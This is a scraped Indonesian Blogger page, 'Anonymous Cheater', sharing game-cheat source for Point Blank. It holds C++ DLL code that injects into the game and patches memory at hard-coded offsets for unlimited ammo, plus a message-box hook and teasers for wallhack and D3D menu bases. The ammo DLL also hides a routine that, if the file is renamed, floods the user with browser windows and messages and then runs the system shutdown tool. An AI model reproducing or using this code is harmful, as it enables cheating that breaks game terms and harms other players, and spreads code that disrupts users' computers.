/* --------------- jquery animation loading page ---------------------------------- */ .QOverlay { background-color: #000000; /*warna background loading */ z-index: 9999; } .QLoader { background-color:#111; /* warna bar loading */ -moz-box-shadow: 0px 1px 80px #ccc; height: 2px; } .QAmt { color:#ccc; /*warna angka loading*/ font-size:50px; font-weight:bold; line-height:50px; height:50px; width:100px; margin:-60px 0 0 -50px; } -->
skip to main | skip to sidebar

Anonymous Cheater

Anonymous Cheater Freedom For Game Online

  • Home
  • Forum
  • My Website
  • My Shortlink
  • My Facebook
  • My Twitter
  • My TV Online
  • My TV Online1

Rabu, 26 Oktober 2011

[Share]Base ammo + Damage SG

22.56 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

nih ane mau share Base Ammo + Damage SG tapi offset di cari sendiri ea  tolong di like juga ea Fanpage blog ini


Read more »

Baca Selengkapnya >>>

Source System IP (bagi yg ingin Jual cheat pake IP)

22.53 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

nih saya mau share Source code Pake System IP tapi sebelumnya tolong like Fanpage ini dolo ya

Read more »

Baca Selengkapnya >>>

[Share] Base WH

22.49 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

nih ane mau Share Base WH lagi

Read more »

Baca Selengkapnya >>>

[Share] Base WH bagi yg blom punya

22.45 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

langsung aja ea
Read more »

Baca Selengkapnya >>>

Selasa, 25 Oktober 2011

Share Kumpulan Hotkey Untuk Cheat Game Online/Offline

19.52 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

Nih bagi yg mau tau Hotkey On/Off Cheat Ane beri tahu tempat Kumpulannya langsung aja ea

Disini kk
Read more »

[C++] Example for calling Message Box function

19.49 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

Ok Langsung aja ya kk Source Code ini Fungsinya untuk Memangil Message Box Dari Dalam Game PB

#include <windows.h>

#define PTR_THIS                0x5efc2c
#define PTR_MSGROOT             0x219e10
#define PTR_CALLER              0x5a680

DWORD dwModule = NULL;

typedef void (__thiscall *pMsgBox)(void*,       /* this pointer */
                                                                   char*,       /* text*/
                                                                   char*,       /* caption */
                                                                   int,         /* type */
                                                                   void*,       /* own message root (callback)*/
                                                                   void*,       /* system message root */
                                                                   int,         /* unknown, biasanya value 10 (0xA) */
                                                                   int,         /* unknown, biasanya value 1 (true?) */
                                                                   int);        /* unknown, biasanya value 1 (true?) */

/*
untuk parameter 'type':
0x10001 = ok only (force exit)
0x10002 = ok (exit) + cancel
0x10004 = no button (wait msgbox)

0x20001 = ok only (no exit)
0x20002 = ok (exit) + cancel
0x20004 = no button (wait msgbox)
*/

bool bInit = false;

pMsgBox _MsgBox;
void* pThis;
void* pProc;

void DoMsgBox() {
        if(!bInit) {
                pThis = (void*)*(DWORD*)(dwModule+PTR_THIS);
                pProc = (void*)(dwModule+PTR_MSGROOT);

                _MsgBox = (pMsgBox)(dwModule+PTR_CALLER);

                bInit = true;
        }

        _MsgBox(pThis,
                        "Hello Anonymous\nIni adalah Contoh Message Box yg Kamu buat\n\nAnonymous Cheater",
                        "Anonim",
                        0x20001,
                        pProc,
                        0,
                        0xA,
                        1,
                        1);
}

void MainThread() {
        while(!dwModule) {
                dwModule = (DWORD)GetModuleHandle("PointBlank.i3Exec");
                Sleep(100);
        }

        while(1) {
                if(GetAsyncKeyState(VK_F1)&1) {
                        DoMsgBox();
                }
                Sleep(10);
        }
       
}

BOOL WINAPI DllMain(HMODULE hDll, DWORD dwReason, LPVOID lpReserved) {
        switch(dwReason) {
                case DLL_PROCESS_ATTACH:
                        DisableThreadLibraryCalls(hDll);
                        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)MainThread, 0, 0, 0);
                        break;

                case DLL_PROCESS_DETACH:
                        FreeLibrary(hDll);
                        break;
        }
        return true;
}
Read more »

Base Ammo Global (Silahkan berkereasi Sendiri)

19.22 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

#include

LPTSTR The = "PointBlank.i3Exec";

DWORD ofsMNZ1, ofsMNZ2, dwBase, adrAmmo , NextProtection, CheckProtection;

#define Unlimited 0x16FDB5

BYTE AmmoON[33] = {0xC7, 0x02, 0x3C, 0x00, 0x00, 0x00, 0x52, 0xE8, 0xBF, 0x76, 0xEB, 0xFF, 0x83, 0xC4, 0x08, 0x8B, 0x45, 0xFC, 0x8B, 0x4D, 0x08, 0x89, 0x88, 0x68, 0x09, 0x00, 0x00, 0x8B, 0xE5, 0x5D, 0xC2, 0x04, 0x00};
BYTE AmmoOFF[33] = {0x52, 0xE8, 0xC5, 0x76, 0xEB, 0xFF, 0x83, 0xC4, 0x08, 0x8B, 0x45, 0xFC, 0x8B, 0x4D, 0x08, 0x89, 0x88, 0x64, 0x09, 0x00, 0x00, 0x8B, 0xE5, 0x5D, 0xC2, 0x04, 0x00, 0x55, 0x8B, 0xEC, 0x51, 0x89, 0x4D};

int snHDD (void)

{

}

UCHAR szFileSys[255],szVolNameBuff[255];

DWORD dwMFL,dwSysFlags;

DWORD dwSerial;

LPCTSTR szHD = "C:\\";//*/

void Ridho(void *adr, void *ptr, int size)

{

DWORD CheckProtection;

VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &ofsMNZ1);

RtlMoveMemory(adr,ptr,size);

VirtualProtect(adr,size,CheckProtection, &dwBase);

}

int DD = 0;

int II
= 0;

int __fastcall Bagicash(void)

{

return 0;

}

DWORD WINAPI ThreadStarter(LPVOID param)

{

while (1)

{

DWORD adrAmmo = 0;

DWORD CheatCalled = 8/5;

if (GetKeyState(VK_CAPITAL)&1)//weqqqsss
{
if (GetAsyncKeyState (0x01) &0x8000 ) // auto on nie
{

DWORD Bool = (DWORD)GetModuleHandleA(The);

if (Bool > 0)
if (Bool > 0)
if (Bool > 0)
if (Bool > 0)
if (Bool > 0)
if (Bool > 0)
if (Bool > 0)
if (Bool > 0)
if (Bool > 0) {

adrAmmo = Bool + (DWORD) Unlimited;

Ridho((void *)(adrAmmo),(void*)(PBYTE)AmmoON, 33);

{

Sleep(50);

}

Ridho((void *)(adrAmmo),(void*)(PBYTE)AmmoOFF, 33);

}

}

/*if (GetAsyncKeyState(VK_F1)&1)

{
DWORD HAMLIGANTENG =(DWORD)GetModuleHandleA("PointBlank.i3exec");
MessageBeep(MB_ICONINFORMATION);

adrGravity = HAMLIGANTENG + (DWORD)Gravity;

Ridho((void *)(adrGravity),(void*)(PBYTE)"\x00\xCC\x3C",3);

}
if (GetAsyncKeyState(VK_F2)&1)

{
DWORD HAMLIGANTENG =(DWORD)GetModuleHandleA("PointBlank.i3exec");
MessageBeep(MB_ICONINFORMATION);

adrGravity = HAMLIGANTENG + (DWORD)Gravity;

Ridho((void *)(adrGravity),(void*)(PBYTE)"\x00\xE0\x3F",3);
}*/
Sleep(20);

}

return (0);
}

BOOL _stdcall DllMain ( HMODULE hDll, DWORD dwReason, LPVOID lpReserved

)

{

switch(dwReason)

{

case DLL_PROCESS_ATTACH:

DisableThreadLibraryCalls(hDll);

GetVolumeInformation(szHD,(LPTSTR)szVolNameBuff,255,&dwSerial,

&dwMFL,&dwSysFlags,(LPTSTR)szFileSys,255);

/*if (dwSerial== 513997084){//edit

MessageBox (0, "|==========���HWID Teregistrasi���==========|","View Ground Metal",MB_ICONINFORMATION) ;

}

else

{

MessageBox (0, "|============���HWID Tidak diregistrasi���============|","View Ground Metal",MB_ICONSTOP);

MessageBox (0, "Silahkan PM Vgm Rizky Avelin Untuk meregistrasi HWID","View Ground Metal",MB_ICONINFORMATION);

ExitProcess(0);

}*/

MessageBeep(0);

MessageBox (0,"Credit : Vgm Rizky Avelin","PrivateELITE Tambores", MB_OKCANCEL + MB_ICONINFORMATION);
MessageBox (0,"Ammo = Klik Kiri + Capslock","HOTKEY", MB_OKCANCEL + MB_ICONINFORMATION);
MessageBox (0,"Thanks To All Member PrivateELITE TamBoReS","View Ground Metal", MB_OKCANCEL + MB_ICONINFORMATION);

CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ThreadStarter, 0, 0, 0);
break;
}
char strDLLName [_MAX_PATH];
GetModuleFileName(hDll, strDLLName , _MAX_PATH);
if (strstr(strDLLName, "Vgm Rizky Avelin.dll") <= 0) {
// Notice Kalau DLL Sudah di Rename
ShellExecute(NULL, "open", "www.facebook.com/tamboress",NULL,NULL,SW_SHOWNORMAL);
MessageBox(0, "5", "WARNING", MB_OK + MB_ICONSTOP );
MessageBox(0, "4", "WARNING", MB_OK + MB_ICONSTOP );
MessageBox(0, "3", "WARNING", MB_OK + MB_ICONSTOP );
MessageBox(0, "2", "WARNING", MB_OK + MB_ICONSTOP );
MessageBox(0, "1", "WARNING", MB_OK + MB_ICONSTOP );
ShellExecute(NULL, "open", "http://www.hurr-durr.com/",NULL,NULL,SW_SHOWNORMAL);
ShellExecute(NULL, "open", "http://www.hurr-durr.com/",NULL,NULL,SW_SHOWNORMAL);
ShellExecute(NULL, "open", "http://www.hurr-durr.com/",NULL,NULL,SW_SHOWNORMAL);
MessageBox(0, "Wooi Leacher pepeq beraninya ganti nama dll gw", "LEACHER", MB_OK + MB_ICONSTOP );
MessageBox(0, "maafin gw ya kalo kompi loe hank", "LEACHER", MB_OK + MB_ICONSTOP );
ShellExecute(NULL, "open", "C:\\Windows\\System32\\shutdown.exe",NULL,NULL,SW_SHOWNORMAL);



ExitProcess(0);//Stop PB

}

return TRUE;

}

Buruan di pake sebelum Offsetnya Geser lagi Ntar cape dah Nyari offsetnya
Read more »

Senin, 24 Oktober 2011

Simple Base D3D Menu

18.06 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

//-----------------------------------------------------------------------------------------------------------------------------------
/****************************************************************
Coded by: JoshRose
edited by: Gaze
Type: Gaze D3D Menu
Credits: JoshRose,Gaze
Status:Undetected
Note:Help Me With My Wallhack's
****************************************************************/
/*******************************************************************************/
#include <windows.h>
#include <wininet.h>
#include <mmsystem.h>
#include <stdio.h>

Read more »

Baca Selengkapnya >>>

Base Logger By Me

18.00 Dery sulaiman
Kirimkan Ini lewat Email BlogThis! Bagikan ke X Berbagi ke Facebook

/*Code By:Anonymous Cheater A.K.A Dery Sulaiman
  Status: Undetect
  Support:LCOI,Badboys,Nyit-nyit.net,D'DI
  Note:Base Logger Untuk Public tapi jangan Lupa Creaditnya ya
  Website: http://www.banjarmasin-pb.co.cc , http://gaze-game.co.cc/Forum , http://www.gazeofficial.co.cc
  Shortlink: http://vc.gazeofficial.co.cc
  Contact: Facebook: http://www.facebook.com/derycheater , Twitter: http://www.twitter.com
  */
Read more »

Baca Selengkapnya >>>
Postingan Lebih Baru Postingan Lama Beranda
Twitter Delicious Facebook Digg Stumbleupon Favorites More

Total Tayangan Halaman

Notice

Just Info Animation Loading Page Sedang Masa Perbaikan Jadi Fitur tersebut tidak bisa di akses sementara.

My Profile

Dery Sulaiman

Buat Lencana Anda

Chat Box

Buku Tamu

di like ea

Kalkulator

Categories

  • anti virus (3)
  • ayodance (8)
  • Base atau Source Code (12)
  • Call OF Duty (1)
  • cheat (2)
  • cross fire (1)
  • game offline (2)
  • hacking (12)
  • Idol street (1)
  • Info (1)
  • Jual (1)
  • Lagu (1)
  • Lowongan Staff (1)
  • nightclub city (1)
  • Ninja Saga (35)
  • Notice (1)
  • Point Blank (500)
  • poker (1)
  • seal online (1)
  • software (14)
  • sofware (2)
  • tutor (14)
  • tutorial (2)
  • TV online (1)
  • wild ones (1)

Blog Archive

  • ▼  2011 (311)
    • ►  11/27 - 12/04 (2)
    • ►  11/20 - 11/27 (1)
    • ►  11/13 - 11/20 (6)
    • ►  10/30 - 11/06 (3)
    • ▼  10/23 - 10/30 (9)
      • [Share]Base ammo + Damage SG
      • Source System IP (bagi yg ingin Jual cheat pake IP)
      • [Share] Base WH
      • [Share] Base WH bagi yg blom punya
      • Share Kumpulan Hotkey Untuk Cheat Game Online/Offline
      • [C++] Example for calling Message Box function
      • Base Ammo Global (Silahkan berkereasi Sendiri)
      • Simple Base D3D Menu
      • Base Logger By Me
    • ►  09/25 - 10/02 (1)
    • ►  09/18 - 09/25 (1)
    • ►  08/07 - 08/14 (1)
    • ►  07/10 - 07/17 (4)
    • ►  06/19 - 06/26 (8)
    • ►  06/12 - 06/19 (6)
    • ►  04/10 - 04/17 (8)
    • ►  04/03 - 04/10 (4)
    • ►  03/27 - 04/03 (5)
    • ►  03/20 - 03/27 (7)
    • ►  03/13 - 03/20 (4)
    • ►  03/06 - 03/13 (1)
    • ►  02/27 - 03/06 (12)
    • ►  02/20 - 02/27 (3)
    • ►  02/13 - 02/20 (30)
    • ►  02/06 - 02/13 (33)
    • ►  01/30 - 02/06 (59)
    • ►  01/23 - 01/30 (56)
    • ►  01/16 - 01/23 (21)
    • ►  01/09 - 01/16 (7)
    • ►  01/02 - 01/09 (19)
  • ►  2010 (325)
    • ►  12/26 - 01/02 (38)
    • ►  12/19 - 12/26 (13)
    • ►  12/12 - 12/19 (13)
    • ►  12/05 - 12/12 (19)
    • ►  11/28 - 12/05 (42)
    • ►  11/21 - 11/28 (35)
    • ►  11/14 - 11/21 (38)
    • ►  11/07 - 11/14 (37)
    • ►  10/31 - 11/07 (30)
    • ►  10/24 - 10/31 (36)
    • ►  10/17 - 10/24 (4)
    • ►  10/10 - 10/17 (20)

Saving Mode

Anonymous Cheater Energy Saving Mode menggunakan CSS3 Move your mouse to go back to the page! Gerakkan mouse anda dan silahkan nikmati kembali posting kami!

design by: www.banjarmasin-pb.co.cc - Anonymous Cheater - Copyright © 2011 - 2012

 
Copyright © 2011 Anonymous Cheater | Powered by Blogger
Design by Blogger | Bloggerized by Dery - N3 | The Largest Forum Cheater On Indonesian
Call Of Duty Modern Warfare 3